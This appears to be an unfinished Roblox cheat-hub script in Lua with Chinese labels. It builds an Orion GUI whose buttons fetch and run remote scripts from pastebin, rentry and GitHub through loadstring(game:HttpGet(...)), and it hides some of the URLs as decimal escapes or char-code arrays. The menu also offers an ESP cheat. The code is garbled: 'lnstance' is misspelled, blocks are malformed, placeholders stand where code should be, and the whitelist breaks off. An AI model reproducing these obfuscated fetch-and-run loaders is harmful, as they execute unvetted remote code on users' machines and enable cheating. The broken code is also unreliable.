local ScreenGui = lnstance.new("ScreenGui")
local frame = lnstance.new("Frame")
local ato = lnstance.new("TextButton")

ScreenGui.Parent = game.CoreGui

OrionLib:MakeWindow({Name = "风脚本:未完成", HidePremium = false, SaveConfig = true,IntroText = "风脚本:未完成", ConfigFolder = "5566"})
	Name = "你的信息",	Icon = "rbxassetid://4483345998",	PremiumOnly = false
	})
local Tab = Window:MakeTab({
    Name = "通用",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "皇脚本",
	Callback = function()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\80\100\84\55\99\65\82\84"))()
end
})    
Tab:AddButton({
	Name = "鸭脚本",
	Callback = function()
loadstring(game:HttpGet(utf8.char((function() return table.unpack({104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,81,89,49,113,112,99,115,106})end)())))()
end
})
Tab:AddButton({
	Name = "创想工作室",
	Callback = function()
_G["ScriptCenter作者:三岁高材生"]="ScriptCenter"local SCC_CharPool={
[1]= tostring(utf8.char((function() return table.unpack({104,116,116,112,115,58,47,47,114,101,110,116,114,121,46,99,111,47,83,99,114,105,112,116,67,101,110,116,101,114,66,121,72,117,105,83,104,97,110,103,111,110,103,122,117,111,115,104,105,47,114,97,119})end)()))}
loadstring(game:HttpGet(SCC_CharPool[1],true))()
end
})   
Tab:AddButton({
	Name = "透视",
	Callback = function()
loadstring(game:HttpGet("https://pastebin.com/raw/MA8jhPWT"))()
end
})   
Tab:AddButton({
	Name = "移动速度",
	Callback = function()
	TextDisappear = true,	Callback = function(Value)
end
})   
local Tab = Window:MakeTab({
    Name = "俄亥",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "龙叔指令脚本",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/longshulol/long/main/longshu/Ohio"))()
end
})    
Tab:AddButton({
	Name = "没做",
	Callback = function()
脚本
end
})......
local about = Window:MakeTab({    Name = "关于",    Icon = "rbxassetid://4483345998",    PremiumOnly = false})about:AddParagraph("作者","私人老登")about:AddParagraph("QQ","639398665")OrionLib:Init()
whitelist = {
"ddbsdu2",
"qawedrdffcvf",
"
}